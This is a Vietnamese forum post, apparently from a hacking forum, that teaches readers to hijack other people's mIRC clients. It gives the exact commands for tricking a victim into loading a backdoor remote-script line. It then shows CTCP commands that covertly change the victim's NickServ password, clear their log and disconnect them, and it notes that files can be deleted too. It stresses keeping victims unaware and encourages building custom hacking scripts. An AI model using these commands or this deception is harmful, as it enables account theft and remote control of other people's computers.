Search
 
 

Display results as :
 


Rechercher Advanced Search

Latest topics
» Tuyệt Kỹ Đong Giai Chân Kinh (tuyệt Kỹ cua trai)
Thu Aug 23, 2012 5:38 am by Admin

» Tuyệt kỹ cua giai
Thu Aug 23, 2012 5:36 am by Admin

» NETCAT.........
Mon Aug 13, 2012 6:35 am by Admin

» Bảo mật CSDL bằng phương pháp mã hóa.
Tue Apr 17, 2012 10:04 pm by Admin

» Hàm mã hóa MD5 bằng JavaScript
Tue Apr 17, 2012 10:03 pm by Admin

» Giá của món quà
Fri Apr 13, 2012 6:01 am by Admin

» Sẽ chỉ yêu ai?
Fri Apr 13, 2012 6:01 am by Admin

» Cách đọc bảng chữ cái!
Thu Apr 12, 2012 10:37 pm by Admin

» Gắn trojan, keylog, virus vào website, forum
Tue Apr 10, 2012 1:14 am by Admin

Shopmotion


Affiliates
free forum


Hack bằng mIRC

Go down

Hack bằng mIRC

Post  Admin on Wed Mar 28, 2012 11:31 pm

cũng như những cách thông dụng của việc lấy pass mail các bạn dùng phần mềm ghi lại pass v.v... ở đây mình không nói lại. Mình xin trình bày 1 cách rất là mIRC dùng chính mIRC để làm việc này.

mIRC có 1 command gọi là ctcp (Client To Client Protocol) nếu trong remote mIRC của 1 nick mà có dòng Script sau : ctcp *:*Question$1- | halt thì coi như mIRC của nick đó bị điều khiển được ( không chỉ riêng mIRC mà cả cái máy tính ấy cũng sẽ bị điều khiền). Bạn có thể điều khiển người ta những gì ban muốn bằng command: /ctcp Nick /command <= nick cần điều khiển, command ban muốn cho Script của nick đó thực hiên, tuy nhiên chú ý là bạn làm sao cho người ta không cảm thấy bị bạn điều khiển.

Ví dụ: nếu nick AnhTK dùng mIRC mà trong remote có : ctcp *:*Question$1- | halt , AnhTraiSG biết được và muốn lấy pass cua nick đó thì AnhTraiSG sẽ gõ những Command sau:

/ctcp AnhTK /ns set password 11223

/ctcp AnhTK /clear -s

/ctcp AnhTK /quit

Thế là pass nick của AnhTK đổi thành 11223 mà AnhTK không hề hay biết. Câu lệnh cuối làm disconnect AnhTK khỏi server đang chat, khi AnhTK connect trở lại, server sẽ đòi pass nick và chắc chắn AnhTK sẽ không khai báo thành công. Bây giời AnhTraiSG cò thể xài được nick AnhTK với pass là 11223

Vì mIRC cua nick AnhTK sẽ thực hiện tất cả các command do ctcp send tới nên nếu hiểu biết nhiều về Command cua mIRC các bạn hoàn toàn có thể xoá files trên máy nan nhân, tạo thư mục,...và có thể viết Script vào mIRC cua họ. Tất nhiên không tự nhiên mà trong mIRC Script cua nan nhân có dòng text : ctcp *:*Question$1- | halt , bạn phải tự Add vào còn không thì lừa họ gõ 2 dòng lệnh sau (gõ vào như chat vậy):

/writeini getp.ini script n0 ctcp *:*Question$1- | halt

/load -rs getp.ini

thì lập tức trong Remote của mIRC của nick đó sẽ có dòng: ctcp *:*Question$1- | halt , và bây giờ thì nick đó đang gặp nguy hiểm.

Vì ctcp *:*Question$1- | halt nhận tất cả các command của tât cả các nick nên nếu muốn nó chỉ nhận Command cua 1 nick nào đó ( ví dụ: AnhTraiSG) mà thôi thì bạn phải gõ những command sau trước khi thao tác khác:

/auser hack AnhTraiSG

/writeini getp.ini script n0 ctcp hack:*Question$1- | halt

/load -rs getp.ini

Chú ý:

mIRC có thể đã(hiếm khi): /ctcps off , /remote off, hoac /ignore -t , nên các ban cũng cần chú /ctcps on, /remote on và không ignore ctcp...

Nói về Script mIRC thì quá là nhiều Command, mình chỉ trình bày cái cốt lõi và cơ bản nhất còn lại để hack có hiệu quả thì bạn nên viết ngay 1 Script hack mIRC cho riêng mình, khi nào có nick bị dính ( dễ bị dính lắm_vì chatter rất hiếu động muốn thử xem là cái gì , và người sành sỏi Script mIRC thì không nhiều đâu) thì hãy dùng nó hack làm người dù có hiểu biết cũng chưa kịp trở tay á! Chúc các bạn thử nghiệm thành công !
avatar
Admin
Admin

Tổng số bài gửi : 782
Join date : 2009-08-15

View user profile http://hackis.forumvi.com

Back to top Go down

Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum